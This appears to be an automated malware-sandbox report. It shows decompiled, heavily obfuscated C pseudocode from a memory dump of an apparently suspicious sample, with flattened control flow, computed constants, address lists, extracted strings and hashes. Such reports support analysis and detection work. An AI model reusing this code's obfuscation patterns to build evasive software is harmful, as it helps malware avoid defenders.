				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0021F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00222674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00218736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x22ca20; // 0x0
						_t397 = E00221B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0021F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00215F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x22ca20; // 0x0
						_t392 = E00218010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x22ca20; // 0x0
					_t395 = E00220A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x0021f993
0x0021f99d
0x0021f9a4
0x0021f9a6
0x0021f9ad
0x0021f9b4
0x0021f9b5
0x0021f9b7
0x0021f9bc
0x0021f9c7
0x0021f9ca
0x0021f9d9
0x0021f9db
0x0021f9e0
0x0021f9e6
0x0021f9e9
0x0021f9ed
0x0021f9f5
0x0021fa02
0x0021fa06
0x0021fa0e
0x0021fa16
0x0021fa1e
0x0021fa23
0x0021fa28
0x0021fa30
0x0021fa3b
0x0021fa46
0x0021fa51
0x0021fa5f
0x0021fa60
0x0021fa66
0x0021fa6e
0x0021fa76
0x0021fa81
0x0021fa8c
0x0021fa97
0x0021fa9f
0x0021faa3
0x0021faab
0x0021fab3
0x0021fabb
0x0021facb
0x0021fad5
0x0021fada
0x0021fade
0x0021fae6
0x0021faee
0x0021faf6
0x0021fafe
0x0021fb06
0x0021fb0e
0x0021fb19
0x0021fb24
0x0021fb2f
0x0021fb3a
0x0021fb45
0x0021fb52
0x0021fb5e
0x0021fb63
0x0021fb69
0x0021fb6e
0x0021fb76
0x0021fb7e
0x0021fb89
0x0021fb91
0x0021fb9c
0x0021fbaf
0x0021fbb2
0x0021fbb9
0x0021fbc4
0x0021fbcc
0x0021fbdc
0x0021fbe0
0x0021fbe8
0x0021fbf3
0x0021fbfa
0x0021fc05
0x0021fc0d
0x0021fc15
0x0021fc1d
0x0021fc25
0x0021fc2d
0x0021fc38
0x0021fc43
0x0021fc4e
0x0021fc5a
0x0021fc5f
0x0021fc65
0x0021fc6d
0x0021fc75
0x0021fc7d
0x0021fc82
0x0021fc8a
0x0021fc92
0x0021fc9a
0x0021fca2
0x0021fca7
0x0021fcaf
0x0021fcb7
0x0021fcbc
0x0021fcc1
0x0021fcc9
0x0021fcd1
0x0021fcd9
0x0021fce3
0x0021fce4
0x0021fce8
0x0021fcf0
0x0021fcf8
0x0021fd06
0x0021fd0a
0x0021fd12
0x0021fd1a
0x0021fd22
0x0021fd27
0x0021fd2f
0x0021fd37
0x0021fd3f
0x0021fd47
0x0021fd4c
0x0021fd54
0x0021fd5c
0x0021fd6c
0x0021fd71
0x0021fd77
0x0021fd7f
0x0021fd8b
0x0021fd90
0x0021fd96
0x0021fd9e
0x0021fda6
0x0021fdae
0x0021fdb6
0x0021fdbe
0x0021fdcb
0x0021fdcc
0x0021fdd0
0x0021fdd5
0x0021fddd
0x0021fde5
0x0021fded
0x0021fdf2
0x0021fdfa
0x0021fe02
0x0021fe0a
0x0021fe12
0x0021fe1a
0x0021fe22
0x0021fe2f
0x0021fe39
0x0021fe3d
0x0021fe45
0x0021fe4c
0x0021fe4c
0x0021fe4c
0x0021fe50
0x0021fe50
0x0021fe50
0x0021fe56
0x00000000
0x00000000
0x0021ff96
0x0022009f
0x002200ca
0x002200cf
0x002200d3
0x002200d6
0x002200dc
0x00000000
0x00000000
0x002200e4
0x002200e9
0x002200ea
0x002200ee
0x002200f4
0x00220117
0x00220125
0x00220125
0x0021fe4c
0x0021fe4c
0x0021fe4c
0x00000000
0x0021fe4c
0x0021fe4c
0x0021ffa2
0x00220082
0x00220087
0x0022008a
0x0021fee7
0x0021fee7
0x00000000
0x0021fee7
0x0021ffae
0x00220001
0x00220004
0x00220009
0x00220009
0x0022000f
0x00220021
0x00220022
0x0022002b
0x0022002d
0x00220033
0x00000000
0x00220039
0x0022003c
0x0022003c
0x00220045
0x0022004c
0x00220051
0x00220055
0x00220059
0x00000000
0x00220059
0x00220033
0x0021ffb6
0x00000000
0x00000000
0x0021ffca
0x0021ffdf
0x0021ffe4
0x0021ffeb
0x0021fff3
0x00000000
0x0021fff3
0x0021fe5c
0x002200fd
0x00220110
0x00220116
0x00000000
0x002200fd
0x0021fe68
0x0021ff86
0x00000000
0x0021ff86
0x0021fe74
0x0021ff73
0x0021ff74
0x0021ff75
0x0021ff7c
0x00000000
0x0021ff7c
0x0021fe80
0x0021fef4
0x0021ff19
0x0021ff2c
0x0021ff31
0x0021ff36
0x0021ff59
0x00000000
0x0021ff59
0x0021ff38
0x0021ff3f
0x0021ff41
0x0021ff43
0x0021ff45
0x0021ff46
0x0021ff4e
0x0021ff52
0x00000000
0x0021ff52
0x0021fe88
0x00000000
0x00000000
0x0021fe8e
0x0021fecd
0x0021fed2
0x0021fed9
0x0021fee1
0x00000000
0x0021fee1

Strings

l, xrefs: 0021FEF4
Q-., xrefs: 0021FF52
-;, xrefs: 0021FD27
s|, xrefs: 0021FB19
), xrefs: 0021FA6E
Q,L, xrefs: 0021FBB9
^), xrefs: 0021FE22
K, xrefs: 0021FABB
[+, xrefs: 0021FD2F
Zb, xrefs: 0021FA76
>, xrefs: 0021FE12
Q-., xrefs: 0021FF90
PL, xrefs: 0021FDAE
{n, xrefs: 0021FB6E
%, xrefs: 0021FBFA
SeK, xrefs: 0021FA3B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: 58864958a5eec7e84b7cc5a67baa6cf7862c1bd2c0a5784e9116e43766ccdb51
Instruction ID: 05b8c12d7be7eed5e6488a2b4c5d6bf85638825a123badb57957baf522324344
Opcode Fuzzy Hash: 58864958a5eec7e84b7cc5a67baa6cf7862c1bd2c0a5784e9116e43766ccdb51
Instruction Fuzzy Hash: D11245725083809FE364CF65C889A8FFBF1BBD4314F108A1DF5A9862A0D7B59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00211CFA, Relevance: 19.3, Strings: 15, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00211CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0021602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x22ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0021C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x22ca20; // 0x0
								_t554 =  *0x22ca20; // 0x0
								_t555 = E0021F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00229465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00218736(_t597);
									 *0x22ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x22ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002187FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x22ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0022AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x22ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00221A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002175AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x22ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0022AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x22ca20; // 0x0
								_t592 =  *0x22ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002166C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0021F536(_v92, _v100, _v108,  *0x22ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00211d01
0x00211d0b
0x00211d0c
0x00211d0e
0x00211d13
0x00211d1e
0x00211d21
0x00211d2c
0x00211d2e
0x00211d37
0x00211d3f
0x00211d4a
0x00211d4f
0x00211d55
0x00211d5d
0x00211d65
0x00211d70
0x00211d7b
0x00211d86
0x00211d91
0x00211d9c
0x00211da7
0x00211db2
0x00211dbd
0x00211dd3
0x00211dde
0x00211de6
0x00211df1
0x00211df9
0x00211dfe
0x00211e06
0x00211e0e
0x00211e16
0x00211e1e
0x00211e26
0x00211e2e
0x00211e36
0x00211e42
0x00211e47
0x00211e52
0x00211e53
0x00211e57
0x00211e5f
0x00211e67
0x00211e6f
0x00211e77
0x00211e7f
0x00211e87
0x00211e92
0x00211ea6
0x00211ead
0x00211eb8
0x00211ec3
0x00211ecb
0x00211ed3
0x00211ede
0x00211ee9
0x00211ef1
0x00211efc
0x00211f07
0x00211f19
0x00211f23
0x00211f28
0x00211f2e
0x00211f33
0x00211f3b
0x00211f43
0x00211f4b
0x00211f4f
0x00211f54
0x00211f5c
0x00211f6e
0x00211f73
0x00211f7c
0x00211f87
0x00211f92
0x00211f9d
0x00211fa8
0x00211fb0
0x00211fbc
0x00211fc1
0x00211fc7
0x00211fcf
0x00211fd7
0x00211fe2
0x00211fed
0x00211ff8
0x00212003
0x0021200b
0x00212018
0x0021201b
0x0021201f
0x00212027
0x0021202f
0x00212037
0x0021203f
0x00212047
0x0021204c
0x00212054
0x0021205f
0x0021206a
0x00212075
0x0021208b
0x00212092
0x0021209d
